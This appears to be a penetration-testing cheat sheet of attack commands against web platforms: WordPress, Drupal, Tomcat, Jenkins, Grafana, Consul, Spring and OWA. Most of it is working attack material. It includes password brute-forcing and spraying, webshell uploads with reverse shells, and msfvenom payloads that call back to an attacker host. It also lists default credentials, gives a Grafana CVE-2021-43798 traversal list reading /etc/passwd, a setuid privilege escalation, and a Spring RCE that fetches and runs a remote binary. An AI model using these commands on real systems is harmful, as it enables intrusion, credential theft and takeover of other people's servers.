CMS / Servers / Others
00. Webroot
/var/www/html/ # Apache
/usr/local/nginx/html/ # Nginx
c:\inetpub\wwwroot\ # IIS
C:\xampp\htdocs\ # XAMPP
01. Wordpress
Scan
## ------------------| Basic
wpscan -e vt,tt,u,ap --url <URL>
wpscan -e vt,tt,u,ap -o wpscan.log --url <URL>
## ------------------| Plugin detection
wpscan -e ap --plugins-detection aggressive --url <URL>
## ------------------| Default Locations
/wp-content/plugins/akismet/index.php
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/twentytwentyone/404.php
/wp-content/themes/twentytwentytwo/404.php
/wp-content/plugins/revslider/public/index.php
/wp-content/plugins/contact-form-7/wp-contact-form-7.php
Bruteforce password/username
## ------------------| With WPScan
wpscan -U <UserName/List> -P <Password/List> --url <URL>
## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python2 wpforce.py -w <Password/List> -i <UserName/List> -u <URL>
## ------------------| With WpCrack
wget https://raw.githubusercontent.com/22XploiterCrew-Team/WpCrack/1.x/WpCrack.py
python WpCrack.py -t <URL> --p <Password/List> -u <UserName>
Username/Password
select user_login,user_pass from wp_users;
Webshell
## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python yertle.py -u "<username>" -p "<password>" -t "<URL>" -i
## Or
## ------------------| Create Plugin
wget https://raw.githubusercontent.com/leonjza/wordpress-shell/master/shell.php
zip -r shell.zip shell.php
## ------------------| Upload to
http://<IP>/wp-admin/plugin-install.php
## ------------------| Execute shell
http://<IP>/wp-content/plugins/shell/shell.php?cmd=id
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')"
## ------------------| Reverse shell (default port:443)
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>"})')"
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>","port":"4545"})')"
02. Joomla
## ------------------| Identify version
# Navigate to
/administrator/manifest/files/joomla.xml
# Check this tag
<version>3.7.5</version>
## ------------------| Run scan
joomscan -u <URL>
03. Drupal
03.1 Enumerations
## ------------------| Username enumeration
### Check if we can register new user (search for "name is already taken")
/user/register
### Check access status
/user/<number>
/user/1
### is 403 --> user exist
### is 404 --> doesn't exist
## ------------------| Hidden pages
wfuzz -c -z range,1-500 --hc 404 http://<IP>/node/FUZZ
03.2 Upload shell
## ------------------| Check "plugin php" status
/modules/php
### if status is 403 --> "plugin php" exists/installed
## ------------------| Install "plugin php"
Modules --> Check for PHP "Filter" --> Save
## ------------------| Upload shell
Add content --> Basic Page/Article --> <paste_shell> --> select "PHP code in Text format" --> Preview
04. Tomcat
## ------------------| Endpoint permissions
/manager/html # <--- roles="manager-gui"
/manager/text/list # <--- roles="manager-script" [If we have /manager, Then we can use curl to upload war file :)]
/host-manager/html # <--- roles="admin-gui"
## ------------------| Path Normalization
/manager/notexsits/..;/html/
/manager/;name=notexsits/html/
/;name=notexsits/manager/ # <--- not work for upload war files
/notexsits/..;/manager/ # <--- not work for upload war files
## Remember to put '/' at the end ^
## ------------------| Common Creds
tomcat:s3cret
tomcat:s3cr3t
admin:s3cr3t
tomcat:tomcat
admin:admin
admin:tomcat
tomcat:Tomcatadm
tomcat:TomcatAdm
tomcat:Tomcatadn
admin:<NOTHING>
## ------------------| Upload paths
/manager/deploy?war=file&path=/shell ## Tomcat6
/manager/text/deploy?path=/shell ## Tomcat7 and above
## ------------------| Upload via curl
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war
curl -u 'username:password' -T shell.war http://<IP>:8080/manager/text/deploy?path=/h4rithd
## ------------------| Manually Upload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war
## Then put the shell.war file to \tomcat\webapps\shell.war directory
## Then use \bin\startup.[sh/bat] file to restart the service and extract the war file.
## Now you can use http://<IP>/shell/
05. Nginx
## ------------------| If code look like this
location /admin {
<--code-->
}
## ------------------| It has LFI; try this
admin../config.php
05. SharePoint / OWA
05.1 SharePoint
## ------------------| Important directories
/_layouts/viewlsts.aspx
05.2 OWA
## ------------------| Setup
git clone https://github.com/byt3bl33d3r/SprayingToolkit
cd SprayingToolkit/
pip3 install -r requirements.txt
## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txts
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt
## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01
06. Jenkins
Interesting endpoints
/manage
/script
Configaration files
## ------------------| Linux
/var/lib/jenkins/users/admin_*/config.xml
/var/lib/jenkins/config.xml
## ------------------| Windows
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\admin_*\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\master.key
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret
Reset password [Read full post from here]
## ------------------| Methord II
## Edit following file
sudo vi /var/lib/jenkins/users/admin_5103638315737262589/config.xml
## Bcrypt password will store under <passwordHash> tag [here i used h4rithd]
<passwordHash>#jbcrypt:$2a$04$gcRUhfwsCQlQKbSTgpFCKOdV9uQuD5/vXwiU1bgULDzW4JB/pNp5S</passwordHash>
## Restart the service
sudo systemctl restart jenkins
## ------------------| Decrypt Password
## If you have access to /script then follow below url
## Get password hash from \users\config.xml
hudson.util.Secret.decrypt '<HASH>'
## If not,
## Download following files
\users\admin_17207690984073220035\config.xml
\secrets\master.key
\secrets\hudson.util.Secret
## Download tool
wget https://raw.githubusercontent.com/gquere/pwn_jenkins/master/offline_decryption/jenkins_offline_decrypt.py
## Execute
python jenkins_offline_decrypt.py master.key hudson.util.Secret config.xml
Remote Code Execution
Create New Job
Schedule Method
Trigger Remotely Method
## ------------------| Trigger the job
curl "http://[username]:[token]@[host]/job/[job name]/build?token=[token name]"
## Ex: curl "http://h4rithd:11afe9af0327e90fed163da849a39837bc@object.htb:8080/job/TestRun/build?token=h4rithdToken"
07. Grafana
Config files
## ------------------|
/etc/grafana/grafana.ini
$WORKING_DIR/conf/defaults.ini
/usr/local/etc/grafana/grafana.ini
Unauthorized reading of files in Grafana [CVE-2021-43798] - videoPOC
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
08. Consul
echo 'chmod 4755 /bin/dash' > /dev/shm/test.sh
curl --header "X-Consul-Token: <TOKEN-********-****>" --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
dash -p
09. Spring Framework
### Spring Boot version 2.6.5
## ------------------| Manual
wget https://raw.githubusercontent.com/sunnyvale-it/CVE-2022-22965-PoC/main/exploit-core.py
python3 exploit-core.py --url http://10.10.11.204:8080/
Spring Cloud Function Vulnerability(CVE-2022-22963)
## ------------------| Manual
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4545 -f elf > h4rithd.elf
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <IP>/h4rithd.elf -o /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
## ------------------| Metasploit
use exploit/multi/http/spring_cloud_function_spel_injection
Last updated